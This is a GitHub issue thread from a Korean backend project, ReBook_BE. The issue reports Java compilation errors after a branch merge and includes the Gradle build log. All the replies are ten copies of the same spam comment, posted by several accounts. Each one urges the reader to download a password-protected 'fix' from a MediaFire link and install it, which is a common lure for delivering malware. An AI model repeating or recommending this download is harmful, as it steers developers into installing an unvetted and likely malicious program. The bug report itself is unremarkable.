### ISSUE TITLE
🐛 [Bug] 브랜치를 머지하면서 생긴 버그들을 수정합니다.

### ISSUE THREAD

**Issue by greatSweetMango** [5-ReBook/ReBook_BE#97]
### Problem

브랜치를 머지하면서 빌드가 되지 않습니다.

### Reproduction

./gradlew build

### Log

```Shell
➜  ReBook_BE git:(develop) gradlew build  

> Task :rebook-product:compileJava FAILED
/Users/kimjaehyuk/Desktop/ReBook_BE/rebook-product/src/main/java/com/be/rebook/product/entity/Product.java:40: warning: @Builder will ignore the initializing expression entirely. If you want the initializing expression to serve as default, add @Builder.Default. If it is not supposed to be settable during building, make the field final.
    private List<ProductImage> productImages = new ArrayList<>();
                               ^
/Users/kimjaehyuk/Desktop/ReBook_BE/rebook-product/src/main/java/com/be/rebook/product/controller/ProductController.java:74: error: incompatible types: String cannot be converted to MemberLoginInfo
                .body(new BaseResponse<>(productService.findAllMyProducts(memberLoginInfo.getUsername())));
                                                                                                     ^
/Users/kimjaehyuk/Desktop/ReBook_BE/rebook-product/src/main/java/com/be/rebook/product/controller/ProductController.java:93: error: method changeStatus in class ProductService cannot be applied to given types;
                .body(new BaseResponse<>(productService.changeStatus(productId, productStatusRequestDTO.getStatus())));
                                                       ^
  required: MemberLoginInfo,Long,String
  found:    Long,String
  reason: actual and formal argument lists differ in length
/Users/kimjaehyuk/Desktop/ReBook_BE/rebook-product/src/main/java/com/be/rebook/product/controller/ProductController.java:93: error: incompatible types: Long cannot be converted to MemberLoginInfo
                .body(new BaseResponse<>(productService.changeStatus(productId, productStatusRequestDTO.getStatus())));
                                                                     ^
Note: Some messages have been simplified; recompile with -Xdiags:verbose to get full output
3 errors
1 warning

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':rebook-product:compileJava'.
> Compilation failed; see the compiler error output for details.

* Try:
> Run with --info option to get more log output.
> Run with --scan to get full insights.

Deprecated Gradle features were used in this build, making it incompatible with Gradle 9.0.

You can use '--warning-mode all' to show the individual deprecation warnings and determine if they come from your own scripts or plugins.

For more on this, please refer to https://docs.gradle.org/8.8/userguide/command_line_interface.html#sec:command_line_warnings in the Gradle documentation.

BUILD FAILED in 4s
18 actionable tasks: 1 executed, 17 up-to-date
➜  ReBook_BE git:(develop)
```

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
